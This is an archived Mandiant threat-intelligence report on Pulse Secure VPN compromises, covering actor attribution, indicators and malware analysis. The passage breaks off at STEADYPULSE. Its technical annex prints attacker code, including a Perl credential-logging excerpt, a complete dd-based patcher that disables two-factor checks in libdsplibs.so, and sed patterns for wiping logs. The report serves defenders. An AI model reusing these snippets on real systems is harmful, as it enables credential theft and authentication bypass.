{ "id": "b485e36d-6e0b-49b9-b0f2-39f873e482a5", "created_at": "2026-04-06T00:09:15.96384Z", "updated_at": "2026-04-10T03:35:44.248652Z", "deleted_at": null, "sha1_hash": "2e1f557e18c735ef48576df8ad89e8d7f5f07be2", "title": "Authentication Bypass Techniques and Pulse Secure Zero-Day", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2343101, "plain_text": "Authentication Bypass Techniques and Pulse Secure Zero-Day\r\nBy Mandiant\r\nPublished: 2021-04-20 · Archived: 2026-04-05 20:56:37 UTC\r\nWritten by: Dan Perez, Sarah Jones, Greg Wood, Stephen Eckels\r\nExecutive Summary\r\nMandiant recently responded to multiple security incidents involving compromises of Pulse Secure VPN appliances.\r\nThis blog post examines multiple, related techniques for bypassing single and multifactor authentication on Pulse\r\nSecure VPN devices, persisting across upgrades, and maintaining access through webshells.\r\nThe investigation by Pulse Secure has determined that a combination of prior vulnerabilities and a previously\r\nunknown vulnerability discovered in April 2021, CVE-2021-22893, are responsible for the initial infection vector.\r\nPulse Secure’s parent company, Ivanti, released mitigations for a vulnerability exploited in relation to these malware\r\nfamilies and the Pulse Connect Secure Integrity Tool for their customers to determine if their systems are impacted. A\r\nfinal patch to address the vulnerability will be available in early May 2021.\r\nPulse Secure has been working closely with Mandiant, affected customers, government partners, and other forensic\r\nexperts to address these issues.\r\nThere is no indication the identified backdoors were introduced through a supply chain compromise of the company’s\r\nnetwork or software deployment process.\r\nIntroduction\r\nMandiant is currently tracking 12 malware families associated with the exploitation of Pulse Secure VPN devices. These\r\nfamilies are related to the circumvention of authentication and backdoor access to these devices, but they are not necessarily\r\nrelated to each other and have been observed in separate investigations. It is likely that multiple actors are responsible for\r\nthe creation and deployment of these various code families.\r\nThe focus of this report is on the activities of UNC2630 against U.S. Defense Industrial base (DIB) networks, but detailed\r\nmalware analysis and detection methods for all samples observed at U.S. and European victim organizations are provided in\r\nthe technical annex to assist network defenders in identifying a large range of malicious activity on affected appliances.\r\nAnalysis is ongoing to determine the extent of the activity.\r\nMandiant continues to collaborate with the Ivanti and Pulse Secure teams, Microsoft Threat Intelligence Center (MSTIC),\r\nand relevant government and law enforcement agencies to investigate the threat, as well as develop recommendations and\r\nmitigations for affected Pulse Secure VPN appliance owners.\r\nAs part of their investigation, Ivanti has released mitigations for a vulnerability exploited in relation to this campaign as well\r\nas the Pulse Connect Secure Integrity Tool to assist with determining if systems have been impacted.\r\nDetails\r\nEarly this year, Mandiant investigated multiple intrusions at defense, government, and financial organizations around the\r\nworld. In each intrusion, the earliest evidence of attacker activity traced back to DHCP IP address ranges belonging to Pulse\r\nSecure VPN appliances in the affected environment.\r\nIn many cases, we were not able to determine how actors obtained administrator-level access to the appliances. However,\r\nbased on analysis by Ivanti, we suspect some intrusions were due to the exploitation of previously disclosed Pulse Secure\r\nvulnerabilities from 2019 and 2020 while other intrusions were due to the exploitation of CVE-2021-22893.\r\nWe observed UNC2630 harvesting credentials from various Pulse Secure VPN login flows, which ultimately allowed the\r\nactor to use legitimate account credentials to move laterally into the affected environments. In order to maintain persistence\r\nto the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts on the VPN\r\nappliance. This was done to accomplish the following:\r\n1. Trojanize shared objects with malicious code to log credentials and bypass authentication flows, including\r\nmultifactor authentication requirements. We track these trojanized assemblies as SLOWPULSE and its variants.\r\n2. Inject webshells we currently track as RADIALPULSE and PULSECHECK into legitimate Internet-accessible Pulse\r\nSecure VPN appliance administrative web pages for the devices.\r\n3. Toggle the filesystem between Read-Only and Read-Write modes to allow for file modification on a typically Read-Only filesystem.\r\n4. Maintain persistence across VPN appliance general upgrades that are performed by the administrator.\r\n5. Unpatch modified files and delete utilities and scripts after use to evade detection.\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 1 of 19\n\n6. Clear relevant log files utilizing a utility tracked as THINBLOOD based on an actor defined regular expression.\r\nIn a separate incident in March 2021, we observed UNC2717 using RADIALPULSE, PULSEJUMP, and HARDPULSE at a\r\nEuropean organization. Although we did not observe PULSEJUMP or HARDPULSE used by UNC2630 against U.S. DIB\r\ncompanies, these malware families have shared characteristics and serve similar purposes to other code families used by\r\nUNC2630. We also observed an OpenSSL library file modified in similar fashion as the other trojanized shared objects. We\r\nbelieve that the modified library file, which we’ve named LOCKPICK, could weaken encryption for communications used\r\nby the appliance, but do not have enough evidence to confirm this.\r\nDue to a lack of context and forensic evidence at this time, Mandiant cannot associate all the code families described in this\r\nreport to UNC2630 or UNC2717. We also note the possibility that one or more related groups is responsible for the\r\ndevelopment and dissemination of these different tools across loosely connected APT actors. It is likely that additional\r\ngroups beyond UNC2630 and UNC2717 have adopted one or more of these tools. Despite these gaps in our understanding,\r\nwe included detailed analysis, detection techniques, and mitigations for all code families in the Technical Annex.\r\nSLOWPULSE\r\nDuring our investigation into the activities of UNC2630, we uncovered a novel malware family we labeled SLOWPULSE.\r\nThis malware and its variants are applied as modifications to legitimate Pulse Secure files to bypass or log credentials in the\r\nauthentication flows that exist within the legitimate Pulse Secure shared object libdsplibs.so. Three of the four discovered\r\nvariants enable the attacker to bypass two-factor authentication. A brief overview of these variants is covered in this section,\r\nrefer to the Technical Annex for more details.\r\nSLOWPULSE Variant 1\r\nThis variant is responsible for bypassing LDAP and RADIUS-2FA authentication routines if a secret backdoor password is\r\nprovided by the attacker. The sample inspects login credentials used at the start of each protocol’s associated routine and\r\nstrategically forces execution down the successful authentication patch if the provided password matches the attacker's\r\nchosen backdoor password.\r\nLDAP Auth Bypass\r\nThe routine DSAuth::LDAPAuthServer::authenticate begins the LDAP authentication procedure. This variant inserts a check\r\nagainst the backdoor password after the bind routine so that the return value can be conditionally stomped to spoof\r\nsuccessful authentication.\r\nFigure 1: LDAP Auth Bypass\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 2 of 19\n\nRADIUS Two Factor Auth Bypass\r\nThe routine DSAuth::RadiusAuthServer::checkUsernamePassword begins the RADIUS-2FA authentication procedure. This\r\nvariant inserts checks against the backdoor password after the RADIUS authentication packet is received back from the\r\nauthentication server. If the backdoor password is provided by the attacker, the packet type and successful authentication\r\nstatus flags are overwritten to spoof successful authentication.\r\nFigure 2: Radius-2FA Bypass\r\nSLOWPULSE Variant 2\r\nACE Two Factor Auth Credential Logging\r\nThis variant logs credentials used during the ACE-2FA authentication procedure\r\nDSAuth::AceAuthServer::checkUsernamePassword. Rather than bypassing authentication, this variant logs the username\r\nand password to a file for later use by the attacker.\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 3 of 19\n\nFigure 3: ACE Auth Credential Log\r\nSLOWPULSE Variant 3\r\nACE Two Factor Auth Bypass\r\nThis variant is responsible for bypassing the ACE-2FA logon procedure starting with\r\nDSAuth::AceAuthServer::checkUsernamePassword. The flow of the authentication procedure is modified to bypass the\r\nroutine responsible for verifying the username and password if the backdoor password is provided. With this modification\r\nthe attacker can spoof successful authentication.\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 4 of 19\n\nFigure 4: ACE Auth Bypass Variant\r\nSLOWPULSE Variant 4\r\nRealmSignin Two Factor Auth Bypass\r\nThis variant bypasses the RealmSignin::runSecondaryAuth procedure of the Pulse Secure VPN. The inserted logic modifies\r\nthe execution flow of a specific step of the login process to spoof successful authentication. We believe that this may be a\r\ntwo-factor authentication bypass.\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 5 of 19\n\nFigure 5: RealmSignIn 2FA Auth Bypass\r\nAttribution\r\nWe are in the early stages of gathering evidence and making attribution assessments and there are a number of gaps in our\r\nunderstanding of UNC2630, UNC2717, and these 12 code families. Nevertheless, the Mandiant and Ivanti teams are\r\nproactively releasing this analysis to assist network defenders in triaging and identifying malicious activity on affected\r\nappliances.\r\nMandiant is able to assess that:\r\nUNC2630 targeted U.S. DIB companies with SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM,\r\nPACEMAKER, SLIGHTPULSE, and PULSECHECK as early as August 2020 until March 2021.\r\nWe suspect UNC2630 operates on behalf of the Chinese government and may have ties to APT5\r\nUNC2717 targeted global government agencies between October 2020 and March 2021 using HARDPULSE,\r\nQUIETPULSE, AND PULSEJUMP.\r\nWe do not have enough evidence about UNC2717 to determine government sponsorship or suspected\r\naffiliation with any known APT group.\r\nWe do not have enough information about the use of LOCKPICK to make an attribution statement.\r\nUNC2630\r\nUNC2630’s combination of infrastructure, tools, and on-network behavior appear to be unique, and we have not observed\r\nthem during any other campaigns or at any other engagement. Despite these new tools and infrastructure, Mandiant analysts\r\nnoted strong similarities to historic intrusions dating back to 2014 and 2015 and conducted by Chinese espionage actor\r\nAPT5. We have also uncovered limited evidence to suggest that UNC2630 operates on behalf of the Chinese government.\r\nAnalysis is still ongoing to determine the full scope of the activity that maybe related to the group.\r\nAlthough we are not able to definitively connect UNC2630 to APT5, or any other existing APT group, a trusted third party\r\nhas uncovered evidence connecting this activity to historic campaigns which Mandiant tracks as Chinese espionage actor\r\nAPT5. While we cannot make the same connections, the third party assessment is consistent with our understanding of\r\nAPT5 and their historic TTPs and targets.\r\nAPT5 has shown significant interest in compromising networking devices and manipulating the underlying software which\r\nsupports these appliances. They have also consistently targeted defense and technology companies in the U.S., Europe, and\r\nAsia.\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 6 of 19\n\nAs early as 2014, Mandiant Incident Response discovered APT5 making unauthorized code modifications to files in\r\nthe embedded operating system of another technology platform.\r\nIn 2015, APT5 compromised a U.S. telecommunications organization providing services and technologies for private\r\nand government entities. During this intrusion, the actors downloaded and modified some of the router images related\r\nto the company’s network routers.\r\nAlso during this time, APT5 stole files related to military technology from a South Asian defense organization.\r\nObserved filenames suggest the actors were interested in product specifications, emails concerning technical\r\nproducts, procurement bids and proposals, and documents on unmanned aerial vehicles (UAVs).\r\nAPT5 persistently targets high value corporate networks and often re-compromises networks over many years. Their\r\nprimary targets appear to be aerospace and defense companies located in the U.S., Europe, and Asia. Secondary\r\ntargets (used to facilitate access to their primary targets) include network appliance manufacturers and software\r\ncompanies usually located in the U.S.\r\nRecommendations\r\nAll Pulse Secure Connect customers should assess the impact of the Pulse Secure mitigations and apply it if possible.\r\nOrganizations should utilize the most recent version of Pulse Secure’s Integrity Assurance utility released on March 31,\r\n2021. If a device fails this Integrity Assurance utility, network administrators should follow the instructions here and contact\r\ntheir Pulse CSR for additional guidance.\r\nOrganizations should examine available forensic evidence to determine if an attacker compromised user credentials. Ivanti\r\nhighly recommends resetting all passwords in the environment and reviewing the configuration to ensure no service\r\naccounts can be used to authenticate to the vulnerability.\r\nAdditional detections, mitigations and relevant MITRE ATT\u0026CK techniques are included in the Technical Annex. Sample\r\nhashes and analysis are included to enable defenders to quickly assess if their respective appliances have been affected. Yara\r\nrules, Snort rules, and hashes are published on Mandiant’s GitHub page.\r\nDetections and Mitigations\r\n1d3ab04e21cfd40aa8d4300a359a09e3b520d39b1496be1e4bc91ae1f6730ecc\r\nHARDPULSE contains an embedded 'recovery' URL https://ive-host/dana-na/auth/recover[.]cgi?token= that may be\r\naccessed by an attacker. The sample uses the POST parameters checkcode, hashid, m, and filename. This URL is not\r\npresent in legitimate versions of this file.\r\n7fa71a7f76ef63465cfeacf58217e0b66fc71bc81d37c44380a6f572b8a3ec7a\r\n68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2\r\nd72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b\r\nPULSEJUMP, RADIALPULSE AND PACEMAKER use the following files to record credentials:\r\n/tmp/dsactiveuser.statementcounters\r\n/tmp/dsstartssh.statementcounters\r\n/tmp/dsserver-check.statementcounters\r\ncd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68\r\nThe malicious operations of SLOWPULSE can be detected via log correlation between the authentication servers\r\nresponsible for LDAP and RADIUS auth and the VPN server. Authentication failures in either LDAP or RADIUS\r\nlogs with the associated VPN logins showing success would be an anomalous event worthy of flagging.\r\na1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1\r\nUpon invocation of the PULSECHECK webshell, the following HTTP request headers will be sent:\r\nKey Value\r\nREQUEST_METHOD POST\r\nHTTP_X_KEY \u003cBackdoorKey\u003e\r\nHTTP_X_CNT \u003cRC4Key\u003e\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 7 of 19\n\nHTTP_X_CMD \u003cRC4Command\u003e\r\n1ab50b77dd9515f6cd9ed07d1d3176ba4627a292dc4a21b16ac9d211353818bd\r\nSLOWPULSE VARIANT 2 writes ACE logon credentials to the file /home/perl/PAUS.pm in a+ (append) mode,\r\nusing the format string %s:%s\\n.\r\n68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2\r\nPACEMAKER is saved at filepath /home/bin/memread\r\nExecuted with commandline flags –t, -m, -s\r\nAttaches to victim processes with PTRACE and opens subfiles in /proc/\r\n88170125598a4fb801102ad56494a773895059ac8550a983fdd2ef429653f079\r\nTHINBLOOD creates the files:\r\n/home/runtime/logs/log.events.vc1\r\n/home/runtime/logs/log.events.vc2\r\n/home/runtime/logs/log.access.vc1\r\n/home/runtime/logs/log.access.vc2\r\nExecutes the system API with the mv command specifying one of the files above, targeting:\r\n/home/runtime/logs/log.access.vc0\r\n/home/runtime/logs/log.events.vc0\r\nExecutes the rm command specify one of the .vc1 files above\r\n133631957d41eed9496ac2774793283ce26f8772de226e7f520d26667b51481a\r\nSLIGHTPULSE uses /tmp/1 as command execution log\r\nAll POST requests to meeting_testjs.cgi are suspicious\r\nPOST parameters: cert, img, name are used by malicious logic\r\nResponses to the endpoint with the name parameter respond with no-cache and image/gif\r\n1741dc0a491fcc8d078220ac9628152668d3370b92a8eae258e34ba28c6473b9\r\nTHINBLOOD execution of sed on the files:\r\nlog.events.vc0\r\nlog.access.vc0\r\nLog.admin.vc0\r\nSed patterns used:\r\ns/.\\x00[^\\x00]*[^\\x00]*\\x09.\\x00//g\r\ns/\\x\\x00[^\\x00]*[^\\x00]*\\x09\\x\\x00//g\r\n06c56bd272b19bf7d7207443693cd1fc774408c4ca56744577b11fee550c23f7\r\nThe sample accepts an input and output file as its first and second arguments, then writes a patched version of the\r\ninput out. The commandline argument e or E must be supplied as the fourth argument. Example command line:\r\n./patcher input.bin output.bin backdoorkey e\r\nf2b1bd703c3eb05541ff84ec375573cbdc70309ccb82aac04b72db205d718e90\r\nThe sample uses the HTTP query parameter id and responds with HTTP headers \"Cache-Control: no-cache\\n\" and\r\n\"Content-type: text/html\\n\\n\".\r\n224b7c45cf6fe4547d3ea66a12c30f3cb4c601b0a80744154697094e73dbd450\r\n64c87520565165ac95b74d6450b3ab8379544933dd3e2f2c4dc9b03a3ec570a7\r\n78d7c7c9f800f6824f63a99d935a4ad0112f97953d8c100deb29dae24d7da282\r\n705cda7d1ace8f4adeec5502aa311620b8d6c64046a1aed2ae833e2f2835154f\r\nExecute sed on PulseSecure system files\r\nRemounts filesystem as writable: system(\"/bin/mount -o remount,rw /dev/root /\")\r\nUnexpected execution of other system commands such as tar, cp, rm\r\nMITRE ATT\u0026CK Techniques\r\nThe following list of MITRE ATT\u0026CK techniques cover all malware samples described in this report as well as those\r\nobserved throughout the lifecycle of UNC2630 and UNC2717.\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 8 of 19\n\nT1003-OS Credential Dumping\r\nT1016-System Network Configuration Discovery\r\nT1021.001-Remote Desktop Protocol\r\nT1027-Obfuscated Files or Information\r\nT1036.005-Match Legitimate Name or Location\r\nT1048-Exfiltration Over Alternative Protocol\r\nT1049-System Network Connections Discovery\r\nT1053-Scheduled Task/Job\r\nT1057-Process Discovery\r\nT1059-Command and Scripting Interpreter\r\nT1059.003-Windows Command Shell\r\nT1070-Indicator Removal on Host\r\nT1070.001-Clear Windows Event Logs\r\nT1070.004-File Deletion\r\nT1071.001-Web Protocols\r\nT1082-System Information Discovery\r\nT1098-Account Manipulation\r\nT1105-Ingress Tool Transfer\r\nT1111-Two-Factor Authentication Interception\r\nT1133-External Remote Services\r\nT1134.001 Access Token Manipulation: Token Impersonation/Theft\r\nT1136-Create Account\r\nT1140-Deobfuscate/Decode Files or Information\r\nT1190-Exploit Public-Facing Application\r\nT1505.003-Web Shell\r\nT1518-Software Discovery\r\nT1554-Compromise Client Software Binary\r\nT1556.004-Network Device Authentication\r\nT1592.004 Gather Victim Host Information: Client Configurations\r\nT1562 Impair Defenses\r\nT1569.002-Service Execution\r\nT1574 Hijack Execution Flow\r\nT1600-Weaken Encryption\r\nFigure 6: MITRE ATT\u0026CK Map\r\nTechnical Annex\r\nSLIGHTPULSE\r\nThe file meeting_testjs.cgi (SHA256: 133631957d41eed9496ac2774793283ce26f8772de226e7f520d26667b51481a) is a\r\nwebshell capable of arbitrary file read, write, and command execution. Malicious logic is inserted at the end of legitimate\r\nlogic to respond to POST requests. We believe this webshell may be responsible for placing additional webshells and used to\r\nmodify legitimate system components resulting in the other observed malware families due to its functionality.\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 9 of 19\n\nThe malicious logic inserts a branch condition to respond to HTTP POST requests rather than just the typical GET requests\r\nexpected of the legitimate code. If GET requests are performed the legitimate logic is still invoked. POST requests have a\r\nseries of parameters checked for existence to determine which command to invoke. This logic is:\r\nPOST params Invoked Command\r\ncert writefile\r\nimg, name with nonempty value readfile\r\nimg set to empty string \"\", name execcmd\r\nanything else invoke original legitimate logic\r\nFigure 7: Webshells respond to POSTs\r\nAll incoming and outgoing requests are base64 encoded/decoded and RC4 encrypted/decrypted. The scheme is simple. The\r\nfirst six characters of the data are a random key generated per request as a sort of nonce, with the static RC4 key appended.\r\nThis nonce + phrase together act as the RC4 key. The phrase is not sent over the wire, only the nonce. This entire key is then\r\nused to encrypt/decrypt payload data that immediately follows the key. The form of data on the wire is:\r\nOutbound/Inbound:\r\n\u003c6randbytes\u003e\r\n^-RC4NONCE-^\r\nUsage:\r\n\u003c6randbytes\u003e\r\n^-------RC4 KEY--------^\r\nReadFile\r\nThis command accepts a base64 encoded, RC4 encrypted file name via the img parameter and opens it for read. The file\r\ncontents are read in full then sent back to the attacker as base64 encoded, RC4 encrypted data with the headers \"Content-type: application/x-download\\n\", and form header \"Content-Disposition: attachment; filename=tmp\\n\\n\".\r\nWriteFile\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 10 of 19\n\nThis command accepts a base64 encoded, RC4 encrypted filename via the cert parameter, and base64 encoded, RC4\r\nencrypted file data via the parameter md5. The filename is opened in write mode with the file data being written to the file\r\nbefore the file is closed. The results of this command are sent back to the attacker, using the headers \"Cache-Control: no-cache\\n\" and \"Content-type: text/html\\n\\n\".\r\nExecute\r\nThis command accepts a base64 encoded, RC4 encrypted commands via the name parameter. The malicious logic forbids\r\nthe cd command and will respond with the text Error 404 if executed. All other commands will be executed via the system\r\nAPI with output piped to the file /tmp/1. The full system command is \u003e/tmp/1 2\u003e\u00261. The output of this execution is read\r\nand sent back to the attacker base64 encoded, RC4 encrypted. The headers \"Cache-Control: no-cache\\n\" and \"Content-type:\r\nimage/gif\\n\\n\" are used. The response appears to be masquerading as a GIF when sending back this command output.\r\nRADIALPULSE\r\nThe file with the SHA256 hash d72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b is a modified\r\nPerl script associated with a PulseSecure web-based tool which causes usernames, passwords and information associated\r\nwith logins to this application to be written to the file /tmp/dsstartssh.statementcounters.\r\nRetrieval of these login credentials must be achieved through other means such as an interactive login or a webshell.\r\nPersistence is achieved by the addition of compromised code which is continually served when requesting this PulseSecure\r\nwebpage.\r\nAn excerpt of the code related to credential stealing is shown as follows:\r\nmy $realmName1 = $signin-\u003egetRealmInfo()-\u003e{name};\r\nopen(*fd, \"\u003e\u003e/tmp/dsstartssh.statementcounters\");\r\nsyswrite(*fd, \"realm=$realmName1 \", 5000);\r\nsyswrite(*fd, \"username=$username \", 5000);\r\nsyswrite(*fd, \"password=$password\\n\", 5000);\r\nclose(*fd);\r\nSLOWPULSE Variant 1\r\nThe file libdsplibs.so with SHA256 cd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68 is a\r\ntrojanized ELF shared object belonging to the PulseSecure VPN server. The sample has been modified to bypass specific\r\nauthentication mechanisms of the LDAP and RADIUS protocols. The sample hardcodes a backdoor key that will silently\r\nsubvert auth failures if the correct backdoor key is passed, establishing a VPN connection as if auth succeeded. If the\r\nbackdoor password is not used, authentication will fail as normal.\r\nIn multiple locations assembly is written into the padding regions between legitimate functions. As these regions are very\r\nsmall, around 20 bytes, the malicious logic stitches itself together by unconditionally jumping between multiple padding\r\nregions. The assembly is written in a way very similar to mid-function hooks, where it is common to push and then pop all\r\nflags and registers before and after the injected logic. By preserving registers and flags in this way the malicious logic is able\r\nto execute and perform its malicious logic as a passive observer if desired, only effecting the control flow in specific\r\nconditions. This is employed in two locations, the LDAP and RADIUS authentication\r\nroutines, DSAuth::LDAPAuthServer::authenticate and DSAuth::RadiusAuthServer::checkUsernamePassword respectively.\r\nLDAP Auth Bypass\r\nIn the typical execution of DSAuth::LDAPAuthServer::authenticate the legitimate application constructs the C++\r\nobject DSAuth::LDAPAuthServer::ldap then passes it to DSLdapServer::bind with the username and password for login.\r\nThis bind may fail or succeed which determines the authentication failure or success of the LDAP protocol. The malicious\r\nlogic inserted into the application redirects execution before DSLdapServer::bind just after the ldap object is constructed. At\r\nthis point in execution the username and password are easily extracted from memory with mid-function hooking techniques,\r\nwhich the sample copies to a code cave in memory between two functions as a temporary storage location. The malicious\r\nlogic then invokes DSLdapServer::bind as the normal logic would, which sets the return register EAX to 0 or 1 for failure or\r\nsuccess. A check is then executed where the temporary password copy made earlier is checked against a hardcoded backdoor\r\npassword. If this check passes the backdoor logic actives by overwriting EAX to 1 to force the application down the\r\nexecution path of successful authentication, even though in reality authentication failed.\r\nRADIUS Two Factor Auth Bypass\r\nIn the typical execution of DSAuth::RadiusAuthServer::checkUsernamePassword the legitimate application sends a\r\nRADIUS-2FA auth packet with username and password via RadiusAuthPacket::sendRadiusPacket. The response is then\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 11 of 19\n\nretrieved and parsed by the routine DSAuth::RadiusAuthServer::handleResponse. After packet retrieval the packet type is\r\nverified to be 3, it's not known what this packet type specifies but this is the packet type of a successful authentication\r\nresponse. If the packet type check passes, then the sample reads a field of the packet that specifies if authentication was\r\nsuccessful or not and then checks this status later. The inserted malicious logic hijacks execution just\r\nafter DSAuth::RadiusAuthServer::handleResponse where the password sent to the RADIUS server is checked against a\r\nbackdoor password. If this check passes the malicious logic overwrites the retrieved packet with values indicating that it's of\r\ntype 3 and that authentication was successful. The malicious logic then rejoins the original execution flow where the packet\r\ntype is checked. If written the spoofed values force the application down the execution path of successful authentication,\r\neven though in reality authentication failed.\r\nSLOWPULSE Variant 2\r\nACE Two Factor Auth Credential Logging\r\nWe also identified a variant of SLOWPULSE\r\n(SHA256: 1ab50b77dd9515f6cd9ed07d1d3176ba4627a292dc4a21b16ac9d211353818bd) which logs credentials used\r\nduring ACE-2FA protocol authentication.\r\nThe backdoor is implemented in the routine DSAuth::AceAuthServer::checkUsernamePassword. As part of the login\r\nprocedure the username and password are retrieved then written into a map entry structure. The backdoor inserts an\r\nunconditional jump into the logon logic that takes this map entry structure, reads the username and password fields, then\r\nwrites them to the file /home/perl/PAUS.pm in a+ (append) mode, using the format string %s:%s\\n. The backdoor then\r\nunconditionally jumps back into the normal control flow to continue the logon process as normal.\r\nSLOWPULSE Variant 3\r\nACE Two Factor Auth Bypass\r\nWe Identified another variant of SLOWPULSE\r\n(SHA256: b1c2368773259fbfef425e0bb716be958faa7e74b3282138059f511011d3afd9) which is similar to SLOWPULSE\r\nVARIANT 2 the malicious logic lives within DSAuth::AceAuthServer::checkUsernamePassword, however this variant\r\nbypasses the logon procedure rather than login credentials. Typical execution of this routine calls DsSecID_checkLogin to\r\nvalidate the username and password which sets the EAX register to 1. The\r\nroutine DSAuth::AceAuthServer::handleACEAuthResult then checks EAX to determine if auth was successful or not. The\r\nmalicious logic hijacks execution immediately after the username and password fields are written to their map entries, then\r\nchecks if the password matches the backdoor password. If the password matches, then the EAX register is overwritten to 1.\r\nThis puts the program in the same state as if DsSecID_checkLogin had successfully executed, but unlike SLOWPULSE\r\nVARIANT 1 the original authentication routine is not called at all. The malicious logic then rejoins execution\r\nbefore DSAuth::AceAuthServer::handleACEAuthResult which will now pass. This forces the application down the\r\nexecution path of successful authentication, even though in reality authentication would have failed.\r\nSLOWPULSE Variant 4\r\nRealmSignin Two Factor Auth Bypass\r\nWe identified a fourth variant of SLOWPULSE responsible for bypassing what may be the two-factor authentication step of\r\nthe DSAuth::RealmSignin process. The backdoor is present within the function DSAuth::RealmSignin::runSigninStep.This\r\nroutine is responsible for multiple steps of the login procedure and is implemented as a large switch statement. Case 11 of\r\nthe switch statement typically calls the\r\nroutines DSMap::setPrivacyKeyNames then DSAuth::RealmSignin::runSecondaryAuth. The malicious logic in this variant\r\noverwrites the call to DSAuth::RealmSignin::runSecondaryAuth with mov eax, 1. This forces application flow as if\r\nDSAuth::RealmSignin::runSecondaryAuth always succeeds, without ever calling it. We were not able to recover a file with\r\nthese patches applied as the attacker removed their patches after use. However, we did uncover both the patcher and\r\nunpatcher utilities. We do not provide a hash for this file as we have not recovered it from a system in the field. This analysis\r\nwas performed by replaying the changes performed by the patcher we did recover.\r\nSLOWPULSE Variant 2 Patcher\r\nAs part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to insert\r\nthe malicious logic into the original libdsplibs.so file. The file with\r\nSHA256: c9b323b9747659eac25cec078895d75f016e26a8b5858567c7fb945b7321722c is responsible for inserting\r\nSLOWPULSE V2 malicious logic to log ACE credentials. The patcher accepts two command line arguments, the path to the\r\noriginal binary and the patched output file path. The original binary is read into memory, patched, and then written to the\r\noutput path. The assembly patches and offsets into the original binary are hardcoded.\r\nSLOWPULSE Variant 3 Patcher\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 12 of 19\n\nAs part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to insert\r\nthe malicious logic into the original libdsplibs.so file. The file with\r\nSHA256: 06c56bd272b19bf7d7207443693cd1fc774408c4ca56744577b11fee550c23f7 is responsible for inserting\r\nSLOWPULSE V3 malicious logic to bypass ACE logon authentication process. The patcher accepts four arguments. The\r\nfirst argument is the original binary path, the second the patched output file path, third is the backdoor bypass password, and\r\nfourth is the letter e specifying to apply patches. The sample reads the original binary into memory, applies the assembly\r\npatches associated with SLOWPULSE V3, as well as the provided bypass password, then written to the output path. The\r\nassembly patches, and all offsets including where to copy the bypass password are hardcoded.\r\nSLOWPULSE Variant 4 Patcher\r\nAs part of our investigation into the SLOWPULSE family we recovered the utility the attacker used to insert the malicious\r\nlogic into the original libdsplibs.so file. The file with\r\nSHA256: e63ab6f82c711e4ecc8f5b36046eb7ea216f41eb90158165b82a6c90560ea415 responsible for inserting the patch for\r\nSLOWPULSE V3. The patch applied overwrites a single call to DSAuth::RealmSignin::runSecondaryAuth with mov eax, 1.\r\nThis patcher utility is a simple bash script, unlike the previous patchers which were compiled applications likely written in\r\nC. The script in full is:\r\nprintf '\\xB8' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B31))printf '\\x01' | dd conv=notrunc\r\nof=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B32))printf '\\x00' | dd conv=notrunc of=/home/lib/libdsplibs.so\r\nbs=1 count=1 seek=$((0x5C7B33))printf '\\x00' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1\r\nseek=$((0x5C7B34))printf '\\x00' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B35))\r\nSLOWPULSE Variant 4 UnPatcher\r\nAs part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to remove\r\nthe malicious logic into the original libdsplibs.so file for SLOWPULSE V4. The attacker chose to remove the patches\r\napplied to libdsplibs.so. The file with\r\nSHA256: b2350954b9484ae4eac42b95fae6edf7a126169d0b93d79f49d36c5e6497062a is the unpatcher utility for\r\nSLOWPULSE V4. This sample is also a simple bash script, in full it is:\r\nprintf '\\xE8' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B31))printf '\\xE2' | dd conv=notrunc\r\nof=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B32))printf '\\x08' | dd conv=notrunc of=/home/lib/libdsplibs.so\r\nbs=1 count=1 seek=$((0x5C7B33))printf '\\xD0' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1\r\nseek=$((0x5C7B34))printf '\\xFF' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B35))\r\nSTEADYPULSE\r\nThe file licenseserverproto.cgi 